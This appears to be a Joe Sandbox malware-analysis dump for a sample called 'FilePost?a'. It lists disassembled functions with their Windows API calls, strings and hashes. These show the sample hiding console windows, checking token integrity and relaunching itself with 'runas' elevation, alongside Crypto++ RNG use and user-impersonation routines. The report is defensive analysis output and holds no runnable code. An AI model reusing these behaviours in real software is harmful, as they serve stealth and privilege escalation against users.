                                          Similarity
                                          • API ID: ClassCloseExecuteHandleNameObjectShellShowSingleWaitWindowlstrcmp
                                          • String ID: <$CASCADIA_HOSTING_WINDOW_CLASS$runas
                                          • API String ID: 1631206612-3791737310
                                          • Opcode ID: cf9003509f88ccb3785606bedfe4f23c96ddf949b1150244c42c2659c0279b48
                                          • Instruction ID: 34c4fdbad00674cbe3b1e2726601eb1df64eb0cac79112bcb24e3fba431886c6
                                          • Opcode Fuzzy Hash: cf9003509f88ccb3785606bedfe4f23c96ddf949b1150244c42c2659c0279b48
                                          • Instruction Fuzzy Hash: 7D41A371D0420C9BDF00DFA4D944BADBBB9FB09315F108259E911A7284EBB49A45CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • __RTC_Initialize.LIBCMT ref: 6D167B2D
                                          • ___scrt_uninitialize_crt.LIBCMT ref: 6D167B47
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Initialize___scrt_uninitialize_crt
                                          • String ID:
                                          • API String ID: 2442719207-0
                                          • Opcode ID: 1f80884aae354c1d76376c4fe73b30ba45fa2d54b0915581ed666cc74c00549e
                                          • Instruction ID: 1b122b86223c2ccd034db2ee29d53c87dfa9e08f798380abbd6f8d0245c7b23d
                                          • Opcode Fuzzy Hash: 1f80884aae354c1d76376c4fe73b30ba45fa2d54b0915581ed666cc74c00549e
                                          • Instruction Fuzzy Hash: FE41E532D0829AEFDB118F68D840B7E7AB4EB91B65F02411BE91057648C7F44D21DBB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • EnumWindows.USER32(6D144B70,00000000), ref: 6D144C00
                                          • GetConsoleWindow.KERNELBASE(00000000), ref: 6D144C08
                                          • ShowWindow.USER32(00000000), ref: 6D144C0F
                                          • GetCurrentProcess.KERNEL32(00000008,?), ref: 6D144C20
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 6D144C27
                                          • GetTokenInformation.KERNELBASE(00000004,00000014(TokenIntegrityLevel),?,00000004,?), ref: 6D144C47
                                            • Part of subcall function 6D143970: GetModuleFileNameW.KERNEL32(00000000,?,00000104,9726ABD3), ref: 6D143878
                                            • Part of subcall function 6D144A50: ShellExecuteExW.SHELL32 ref: 6D144ADB
                                            • Part of subcall function 6D144A50: WaitForSingleObject.KERNEL32(6D18C8CD,000000FF), ref: 6D144AEA
                                            • Part of subcall function 6D144A50: CloseHandle.KERNEL32(6D18C8CD), ref: 6D144AF3
                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 6D144C5B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: CloseProcessTokenWindow$ChangeConsoleCurrentEnumExecuteFileFindHandleInformationModuleNameNotificationObjectOpenShellShowSingleWaitWindows
                                          • String ID:
                                          • API String ID: 2167664763-0
                                          • Opcode ID: 518a9f4f4be158d1809b14a1b5f5d04932e0c69333098cef09276c09d44d2d7a
                                          • Instruction ID: 0a47d13a042307f196edbcbd37e57af5df80afa4b225ab5cc6d25cfc07f44d78
                                          • Opcode Fuzzy Hash: 518a9f4f4be158d1809b14a1b5f5d04932e0c69333098cef09276c09d44d2d7a
                                          • Instruction Fuzzy Hash: 7741AF71E10108AFDB04DFA4DD98BAEBBB8FF09711F508119F622E7684DBB49501CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: dllmain_raw$dllmain_crt_dispatch
                                          • String ID:
                                          • API String ID: 3136044242-0
                                          • Opcode ID: 0b62fb9dd0606ad0fcbf5c48007747620b4ac840fbd7e7cc5237beaef0440b2a
                                          • Instruction ID: 5654e3d2f19f01df9b82d9898c6623807f3e5a303e50425f9d11cf7d6aade324
                                          • Opcode Fuzzy Hash: 0b62fb9dd0606ad0fcbf5c48007747620b4ac840fbd7e7cc5237beaef0440b2a
                                          • Instruction Fuzzy Hash: 0B218071D0869BBBCB214E14D840A7F3A79ABA1BA4B024116FD1457618C7B08D61DBF0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • GetClassNameW.USER32(?,?,00000064), ref: 6D144B91
                                          • lstrcmpW.KERNELBASE(?,CASCADIA_HOSTING_WINDOW_CLASS), ref: 6D144BA3
                                          • ShowWindow.USER32(?,00000000), ref: 6D144BAF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ClassNameShowWindowlstrcmp
                                          • String ID: <$CASCADIA_HOSTING_WINDOW_CLASS$runas
                                          • API String ID: 3203229717-3791737310
                                          • Opcode ID: 610ce467617221a8f11636a3416b5cad2d064dcb28cc0d4b57cdfd4ca9cb19b6
                                          • Instruction ID: 3e19e7affc910179e836f1e532607612aa53f43f8b98f70189c373a7dbfffbf3
                                          • Opcode Fuzzy Hash: 610ce467617221a8f11636a3416b5cad2d064dcb28cc0d4b57cdfd4ca9cb19b6
                                          • Instruction Fuzzy Hash: 2EF0FEB5945118ABDB10DA64D908FAA77BCEB0A315F008096AA41D3140EBB49A59DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • __RTC_Initialize.LIBCMT ref: 6D167A2C
                                            • Part of subcall function 6D167655: InitializeSListHead.KERNEL32(6D1CB330,6D167A36,6D1A6BA8,00000010,6D1679C7,?,?,?,6D167BEF,?,00000001,?,?,00000001,?,6D1A6BF0), ref: 6D16765A
                                          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D167A96
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                          • String ID:
                                          • API String ID: 3231365870-0
                                          • Opcode ID: e7136859660c45e8d99226c847abbff9fab11e6726d9e0c6050b0c758673d5c1
                                          • Instruction ID: 61c1dde5aab97e913d016f25e26564d165befb1db80e993543f9ab698b58fa01
                                          • Opcode Fuzzy Hash: e7136859660c45e8d99226c847abbff9fab11e6726d9e0c6050b0c758673d5c1
                                          • Instruction Fuzzy Hash: DF215735A4C2835ADF00ABB8D4047BC77B19F1272EF29040BEB5067ACACBE14264C675
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • GetStdHandle.KERNEL32(000000F6), ref: 6D17B56D
                                          • GetFileType.KERNELBASE(00000000), ref: 6D17B57F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: FileHandleType
                                          • String ID:
                                          • API String ID: 3000768030-0
                                          • Opcode ID: efc9548948421436fe5ecaa680a42c7c67bc4cd61185f1e8c585dfa7f2298f71
                                          • Instruction ID: 4a8749eff70b0bdc7d3acb270d48786ba412748ca45aa660612d238180b2f190
                                          • Opcode Fuzzy Hash: efc9548948421436fe5ecaa680a42c7c67bc4cd61185f1e8c585dfa7f2298f71
                                          • Instruction Fuzzy Hash: 4811E971218B5346C7318A3E9E886367FA5AB77335F240B19E0B5C65F5C3F4D585C241
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,6D144BD0,00000000,00000000,00000000), ref: 6D144DE8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6D167332
                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6D167340
                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6D167351
                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6D167362
                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6D167373
                                          • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 6D167384
                                          • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 6D167395
                                          • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 6D1673A6
                                          • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 6D1673B7
                                          • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 6D1673C8
                                          • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 6D1673D9
                                          • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 6D1673EA
                                          • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 6D1673FB
                                          • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 6D16740C
                                          • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 6D16741D
                                          • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 6D16742E
                                          • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 6D16743F
                                          • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 6D167450
                                          • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 6D167461
                                          • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 6D167472
                                          • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 6D167483
                                          • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 6D167494
                                          • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 6D1674A5
                                          • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 6D1674B6
                                          • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 6D1674C7
                                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6D1674D8
                                          • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 6D1674E9
                                          • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 6D1674FA
                                          • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 6D16750B
                                          • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 6D16751C
                                          • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 6D16752D
                                          • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 6D16753E
                                          • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 6D16754F
                                          • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 6D167560
                                          • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 6D167571
                                          • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 6D167582
                                          • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 6D167593
                                          • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 6D1675A4
                                          • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 6D1675B5
                                          • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 6D1675C6
                                          • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 6D1675D7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                          • API String ID: 667068680-295688737
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000020,00000001,00000000), ref: 00346871
                                          • GetCurrentProcess.KERNEL32(?), ref: 0034689B
                                          • GetCurrentProcess.KERNEL32 ref: 003468A3
                                          • DuplicateHandle.KERNEL32(00000000,?,00000000,00000004,00000000,00000000,00000002), ref: 003468B8
                                          • GetLastError.KERNEL32 ref: 003468C2
                                          • DestroyEnvironmentBlock.USERENV(00000000,?,00000000), ref: 00346B44
                                          • DestroyEnvironmentBlock.USERENV(00000000,?,00000000), ref: 00346B54
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000), ref: 00346B76
                                          • UnloadUserProfile.USERENV(?,?,?,00000000), ref: 00346B91
                                          • CloseHandle.KERNEL32(?,?,00000000), ref: 00346BA1
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(-00000001), ref: 00346BAF
                                            • Part of subcall function 003427C0: GetLastError.KERNEL32(?,?,00343B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 003427D8
                                            • Part of subcall function 003427C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00343B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 003427F3
                                            • Part of subcall function 003427C0: Warning.VMWAREBASE(?,0034A850,?,?,00001000,?,00000005,?,?,00343B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00342807
                                            • Part of subcall function 003427C0: _printf.MSPDB140-MSVCRT ref: 00342824
                                            • Part of subcall function 003427C0: SetLastError.KERNEL32(00000000,?,?,00343B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 0034282D
                                          • GetLastError.KERNEL32 ref: 00346BCE
                                            • Part of subcall function 00342700: Warning.VMWAREBASE(?,00001000,?,00346E9C,?,00346E9C,RevertToSelf failed: %d,00000000), ref: 0034273F
                                          Strings
                                          • The system environment block appears to be corrupted. Please fix your environment block and try again., xrefs: 003469EF
                                          • GetEnvironmentStrings() failed: %d, xrefs: 003469BC
                                          • DuplicateHandle failed: %d, xrefs: 003468C9
                                          • CreateEnvironmentBlock(NULL) failed: %d, xrefs: 00346A0A
                                          • P<kv, xrefs: 0034697A, 00346B76, 00346BAF
                                          • CreateLogonSession: spawn with username: %s, xrefs: 0034696F
                                          • GetUserName failed: %d, xrefs: 00346948
                                          • , xrefs: 003468E3
                                          • Your environment block appears to be corrupted. Please fix your environment block and try again., xrefs: 00346A6E
                                          • CreateEnvironmentBlock(hToken) failed: %d, xrefs: 00346A86
                                          • ImpersonateLoggedOnUser failed: %d, xrefs: 00346905
                                          • is NOT, xrefs: 00346988
                                          • calloc failed, xrefs: 00346880
                                          • (Account %s administrator), xrefs: 00346996
                                          • LoadUserProfile failed: %d, xrefs: 00346A37
                                          • RevertToSelf failed: %d, xrefs: 00346BD5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4088941987.0000000000341000.00000020.00000001.01000000.00000008.sdmp, Offset: 00340000, based on PE: true
                                          • Associated: 00000003.00000002.4088886858.0000000000340000.00000002.00000001.01000000.00000008.sdmp
                                          • Associated: 00000003.00000002.4088991089.000000000034A000.00000002.00000001.01000000.00000008.sdmp
                                          • Associated: 00000003.00000002.4089031269.0000000000352000.00000002.00000001.01000000.00000008.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_340000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorLast$Warning$BlockCurrentDestroyEnvironmentHandleProcessfree$CloseDuplicateProfileUnloadUser_printfcalloc
                                          • String ID: $ (Account %s administrator)$CreateEnvironmentBlock(NULL) failed: %d$CreateEnvironmentBlock(hToken) failed: %d$CreateLogonSession: spawn with username: %s$DuplicateHandle failed: %d$GetEnvironmentStrings() failed: %d$GetUserName failed: %d$ImpersonateLoggedOnUser failed: %d$LoadUserProfile failed: %d$P<kv$RevertToSelf failed: %d$The system environment block appears to be corrupted. Please fix your environment block and try again.$Your environment block appears to be corrupted. Please fix your environment block and try again.$calloc failed$is NOT
                                          • API String ID: 943474365-3262040921
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,9726ABD3,?,00000000,6D144435), ref: 6D151955
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,6D18D77D,000000FF,?,6D151FA0), ref: 6D15195B
                                          • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 6D15196F
                                          • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 6D151980
                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,6D18D77D,000000FF), ref: 6D1519A5
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 6D151A22
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: AcquireContextCrypt$ErrorLast$___std_exception_copy
                                          • String ID: CryptAcquireContext$Crypto++ RNG
                                          • API String ID: 616088579-1159690233
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,2000000B,6D18722F,00000002,00000000,?,?,?,6D18722F,?,00000000), ref: 6D186FAA
                                          • GetLocaleInfoW.KERNEL32(00000000,20001004,6D18722F,00000002,00000000,?,?,?,6D18722F,?,00000000), ref: 6D186FD3
                                          • GetACP.KERNEL32(?,?,6D18722F,?,00000000), ref: 6D186FE8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: ACP$OCP
                                          • API String ID: 2299586839-711371036
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 6D17B05D: GetLastError.KERNEL32(?,?,?,6D17D632,?,00000001,6D173A72,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000), ref: 6D17B062
                                            • Part of subcall function 6D17B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000,00000000,6D1A6E90,0000002C,6D173A72), ref: 6D17B100
                                            • Part of subcall function 6D17B05D: _free.LIBCMT ref: 6D17B0BF
                                            • Part of subcall function 6D17B05D: _free.LIBCMT ref: 6D17B0F5
                                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6D1871F2
                                          • IsValidCodePage.KERNEL32(00000000), ref: 6D18723B
                                          • IsValidLocale.KERNEL32(?,00000001), ref: 6D18724A
                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6D187292
                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6D1872B1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                          • String ID:
                                          • API String ID: 949163717-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastError.KERNEL32(9726ABD3,75A8FC30,?), ref: 6D151AB8
                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6D151DF0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ContextCryptErrorLastRelease
                                          • String ID: operation failed with error $OS_Rng:
                                          • API String ID: 3299239745-700108173
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 6D17B05D: GetLastError.KERNEL32(?,?,?,6D17D632,?,00000001,6D173A72,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000), ref: 6D17B062
                                            • Part of subcall function 6D17B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000,00000000,6D1A6E90,0000002C,6D173A72), ref: 6D17B100
                                          • GetACP.KERNEL32(?,?,?,?,?,?,6D17C15D,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 6D186846
                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6D17C15D,?,?,?,00000055,?,-00000050,?,?), ref: 6D186871
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6D1869D4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorLast$CodeInfoLocalePageValid
                                          • String ID: utf8
                                          • API String ID: 607553120-905460609
                                          • Opcode ID: f090d4b0e2ad2a16e5e0957dbb022e8b3a57b130295a01f5f739e0612ca48a94
                                          • Instruction ID: 89bd73fe221aca5c898d2c21e6697b7460bb8a3c89508ca830e442f9ebbf3640
                                          • Opcode Fuzzy Hash: f090d4b0e2ad2a16e5e0957dbb022e8b3a57b130295a01f5f739e0612ca48a94
                                          • Instruction Fuzzy Hash: DE711671A2470AAAE715DB34DC45FBB33A8EF55704F11442AE619DB18AEBF0D940CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6D16856A
                                          • IsDebuggerPresent.KERNEL32 ref: 6D168636
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6D168656
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 6D168660
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                          • String ID:
                                          • API String ID: 254469556-0
                                          • Opcode ID: 73b3d0d70d979450debbb90a6e5cd7aea163a7d112676a8bd08915a2f6e0917e
                                          • Instruction ID: b16580ae8e7e264a822870e93bc9981662eaeaadfa08eb519b91c31fe129e512
                                          • Opcode Fuzzy Hash: 73b3d0d70d979450debbb90a6e5cd7aea163a7d112676a8bd08915a2f6e0917e
                                          • Instruction Fuzzy Hash: 3D313675D05258DBDB10EFA0D9897CCBBB8AF09304F1041AAE50CAB290EBB49A848F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CryptGenRandom.ADVAPI32(6D144435,00000000,00000001), ref: 6D151FC8
                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6D151FEB
                                            • Part of subcall function 6D167E22: EnterCriticalSection.KERNEL32(6D1CB368,?,00000000,?,6D15203E,6D1C9F48,00000001), ref: 6D167E2D
                                            • Part of subcall function 6D167E22: LeaveCriticalSection.KERNEL32(6D1CB368,?,6D15203E,6D1C9F48,00000001), ref: 6D167E6A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: CriticalCryptSection$ContextEnterLeaveRandomRelease
                                          • String ID: CryptGenRandom
                                          • API String ID: 1877079010-3616286655
                                          • Opcode ID: a81d802db16d94a19a8d56ee9132b4f1531f61f48e56c2a2433915615e0fb8ab
                                          • Instruction ID: a5e5fa7b265e297cf8206b40e3e9de0a779a35e3c4f8d5c6e6a7069262a037b7
                                          • Opcode Fuzzy Hash: a81d802db16d94a19a8d56ee9132b4f1531f61f48e56c2a2433915615e0fb8ab
                                          • Instruction Fuzzy Hash: E15118B1804245DFCB11DF98C844FADBBB4FF15358F02419EE9216B389CBB8A964CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 6D17B05D: GetLastError.KERNEL32(?,?,?,6D17D632,?,00000001,6D173A72,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000), ref: 6D17B062
                                            • Part of subcall function 6D17B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000,00000000,6D1A6E90,0000002C,6D173A72), ref: 6D17B100
                                            • Part of subcall function 6D17B05D: _free.LIBCMT ref: 6D17B0BF
                                            • Part of subcall function 6D17B05D: _free.LIBCMT ref: 6D17B0F5
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D186BEC
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D186C36
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D186CFC
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: InfoLocale$ErrorLast_free
                                          • String ID:
                                          • API String ID: 3140898709-0
                                          • Opcode ID: c2fd4672c386a6ef2d426ec6801ba2e79e61f7237d44b7a7c04622f0d936a194
                                          • Instruction ID: b4fbcb656630b0cf970a6a14008a30d7d312e127787495d152f6297776ec7e7f
                                          • Opcode Fuzzy Hash: c2fd4672c386a6ef2d426ec6801ba2e79e61f7237d44b7a7c04622f0d936a194
                                          • Instruction Fuzzy Hash: DF61B17196420B9FEB19DF28DD81BBA77B8EF14300F10426AE915C628EE7B4D944CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6D173106
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6D173110
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6D17311D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
